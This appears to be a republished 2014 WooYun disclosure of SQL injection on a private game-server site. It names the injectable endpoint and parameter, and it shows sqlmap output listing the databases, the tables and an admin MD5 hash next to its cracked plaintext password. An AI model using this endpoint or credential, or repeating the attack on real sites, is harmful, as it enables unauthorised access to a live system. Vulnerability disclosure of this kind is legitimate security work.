某个私服站点有SQL注射漏洞

admin
admin
admin
139475
文章
114
评论
2015年5月17日01:30:16评论318 views字数 215阅读0分43秒阅读模式
摘要

2014-08-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-22: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(6) 关注此漏洞

缺陷编号: WooYun-2014-71561

漏洞标题: 某个私服站点有SQL注射漏洞

相关厂商: http://www.8090yxs.com/

漏洞作者: Jn·

提交时间: 2014-08-08 15:15

公开时间: 2014-09-22 15:16

漏洞类型:

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏

漏洞详情

披露状态:

2014-08-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

搜搜搜. 一道道剑光飞过,再这时灵石一扫突然发现前面有个穿丝袜的美女....于事如何请下次听讲

详细说明:

哎5068都联系不到厂商,不知道这个私服站点...果断提交

注入地址:http://member.8090yxs.com/api/address.php?sname=

直接上SLQMAP神器

某个私服站点有SQL注射漏洞

某个私服站点有SQL注射漏洞

available databases [3]:

[*] 8090_activity

[*] data8090

[*] information_schema

Database: 8090_activity

[77 tables]

+--------------------------+

| butt_user |

| card_address |

| cj_card |

| cj_prize |

| cj_reward |

| cjxx |

| cy_cj_card |

| cy_cj_prize |

| cy_cj_reward |

| han_wang |

| lhzs_0121_card |

| lhzs_0121_prize |

| lhzs_0121_reward |

| lhzs_0903_card |

| lhzs_0903_prize |

| lhzs_0903_reward |

| lhzs_1206_card |

| lhzs_1206_prize |

| lhzs_1206_reward |

| lhzs_20130722_card |

| lhzs_20130722_prize |

| lhzs_20130722_reward |

| lhzs_bf_card |

| lhzs_bf_card_copy |

| lhzs_bf_card_copy1 |

| lhzs_bf_prize |

| lhzs_bf_prize_copy |

| lhzs_bf_reward |

| lhzs_bf_reward_copy |

| lhzs_cj_card |

| lhzs_cj_prize |

| lhzs_cj_reward |

| lhzs_fang_bf_card |

| lhzs_fang_bf_prize |

| lhzs_fang_bf_reward |

| lhzs_fang_card |

| lhzs_fang_prize |

| lhzs_fang_reward |

| nslm_0929_answer |

| num |

| plug_games |

| plug_platform |

| sctx_liuyan |

| sfj_admin |

| sfj_ks |

| sfj_tk |

| sfj_user |

| sjb |

| tab_config |

| tb_butt |

| tb_butt_copy |

| tlcs_0802_card |

| tlcs_qd |

| tlcs_record |

| tlcs_reward |

| wssg_fang_prize |

| wssg_fang_prize_copy |

| wssg_fang_prize_copy1 |

| wssg_fang_reward |

| www_1231 |

| wy_0108_card |

| wy_0108_prize |

| wy_0108_reward |

| wy_1121_card |

| wy_1121_card_copy |

| wy_1121_prize |

| wy_1121_reward |

| wz_0226_reward |

| wz_1130_reward |

| wz_1230_reward |

| zuiwuji_0226_card |

| zuiwuji_0226_card_copy |

| zuiwuji_0226_prize |

| zuiwuji_0226_prize_copy |

| zuiwuji_0226_prize_copy1 |

| zuiwuji_0226_reward |

| zuiwuji_0226_reward_copy |

+--------------------------+

Database: 8090_activity

Table: sfj_admin

[1 entry]

+----+----------------------------------+----------+

| id | passwd | username |

+----+----------------------------------+----------+

| 1 | 63ee451939ed580ef3c4b6f0109d1fd0 | admin | 123123

+----+----------------------------------+----------+

漏洞证明:

某个私服站点有SQL注射漏洞

修复方案:

版权声明:转载请注明来源 Jn· @乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-08-09 10:36 | 小震 ( 路人 | Rank:8 漏洞数:3 | ~)

    1

    什么玩意。。

  2. 2014-08-09 16:14 | 草榴社区 ( 普通白帽子 | Rank:109 漏洞数:26 | Rank:9999 漏洞数:1024 | 未满18周岁,不准...)

    0

    及其煞笔的玩意,我找一堆低版本的DVBBS,某个人站点有SQL注入,上传漏洞,

  3. 2014-08-10 18:56 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    0

    看到标题,我震精了。。

  4. 2014-09-23 12:58 | 小卖部部长 ( 路人 | Rank:24 漏洞数:3 | 别拿部长不当干部!)

    0

    @草榴社区 我K,这名字?1024啊~~~

  5. 2015-06-19 22:29 | 名字xsser ( 路人 | Rank:5 漏洞数:1 | 顺流而下,把梦做完|最近小忙,有问题可以...)

    0

    ......

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin